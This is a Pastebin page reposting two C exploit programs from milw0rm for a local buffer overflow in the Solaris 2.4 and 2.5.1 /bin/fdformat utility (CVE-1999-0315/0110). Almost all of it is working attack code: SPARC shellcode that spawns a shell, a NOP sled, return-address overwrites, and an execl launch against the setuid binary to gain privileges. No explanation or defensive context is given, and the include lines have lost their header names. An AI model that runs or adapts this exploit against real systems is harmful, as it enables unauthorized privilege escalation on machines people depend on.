FlyFar

Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow - CVE-1999-0315/1999-0110

Feb 25th, 2024
87
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.29 KB | Cybersecurity | 0 0
  1. --------------------------- lion24.c ---------------------------------
  2. /*
  3. Solaris 2.4
  4. */
  5.  
  6.   #include
  7.    #include
  8.    #include
  9.    #include
  10.    
  11.    #define BUF_LENGTH 264
  12.    #define EXTRA 36
  13.    #define STACK_OFFSET -56
  14.    #define SPARC_NOP 0xa61cc013
  15.    
  16.    u_char sparc_shellcode[] =
  17.  
  18.    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
  19.    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
  20.    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  21.    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
  22.    "\x91\xd0\x20\x08"
  23.    ;
  24.    
  25.    u_long get_sp(void)
  26.    {
  27.    __asm__("mov %sp,%i0 \n");
  28.    }
  29.    
  30.    void main(int argc, char *argv[])
  31.    {
  32.    char buf[BUF_LENGTH + EXTRA + 8];
  33.    long targ_addr;
  34.    u_long *long_p;
  35.    u_char *char_p;
  36.    int i, code_length = strlen(sparc_shellcode),dso=0;
  37.    
  38.    if(argc > 1) dso=atoi(argv[1]);
  39.    
  40.    long_p =(u_long *) buf ;
  41.    targ_addr = get_sp() - STACK_OFFSET - dso;
  42.    
  43.    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  44.    *long_p++ = SPARC_NOP;
  45.    
  46.    char_p = (u_char *) long_p;
  47.    
  48.    for (i = 0; i < code_length; i++)
  49.    *char_p++ = sparc_shellcode[i];
  50.    
  51.    long_p = (u_long *) char_p;
  52.    
  53.    for (i = 0; i < EXTRA / sizeof(u_long); i++)
  54.    *long_p++ =targ_addr;
  55.    
  56.    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  57.    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  58.    execl("/bin/fdformat", "fdformat   ", &buf[0],(char *) 0);
  59.    perror("execl failed");
  60.    }
  61. ------------------------------ end of lion24.c --------------------------
  62.  
  63. -------------------------------- lion25.c ------------------------------
  64. /*
  65. Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on
  66. 2.5.1
  67. */
  68.  
  69.    #include
  70.    #include
  71.    #include
  72.    #include
  73.    
  74.    #define BUF_LENGTH 364
  75.    #define EXTRA 400
  76.    #define STACK_OFFSET 704
  77.    #define SPARC_NOP 0xa61cc013
  78.    
  79.    u_char sparc_shellcode[] =
  80.  
  81.    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
  82.    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
  83.    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  84.    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
  85.    "\x91\xd0\x20\x08"
  86.    ;
  87.    
  88.    u_long get_sp(void)
  89.    {
  90.    __asm__("mov %sp,%i0 \n");
  91.    }
  92.    void main(int argc, char *argv[])
  93.    {
  94.    char buf[BUF_LENGTH + EXTRA + 8];
  95.    long targ_addr;
  96.    u_long *long_p;
  97.    u_char *char_p;
  98.    int i, code_length = strlen(sparc_shellcode),dso=0;
  99.    
  100.    if(argc > 1) dso=atoi(argv[1]);
  101.    
  102.    long_p =(u_long *) buf ;
  103.    targ_addr = get_sp() - STACK_OFFSET - dso;
  104.    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  105.    *long_p++ = SPARC_NOP;
  106.    
  107.    char_p = (u_char *) long_p;
  108.    
  109.    for (i = 0; i < code_length; i++)
  110.    *char_p++ = sparc_shellcode[i];
  111.    
  112.    long_p = (u_long *) char_p;
  113.    
  114.    for (i = 0; i < EXTRA / sizeof(u_long); i++)
  115.    *long_p++ =targ_addr;
  116.    
  117.    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  118.    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  119.    execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0);
  120.    perror("execl failed");
  121.    }
  122.  
  123. --------------------------- end of lion25.c -------------------------------
  124.  
  125.  
  126. // milw0rm.com [1997-03-23]
  127.            
Add Comment
Please, Sign In to add comment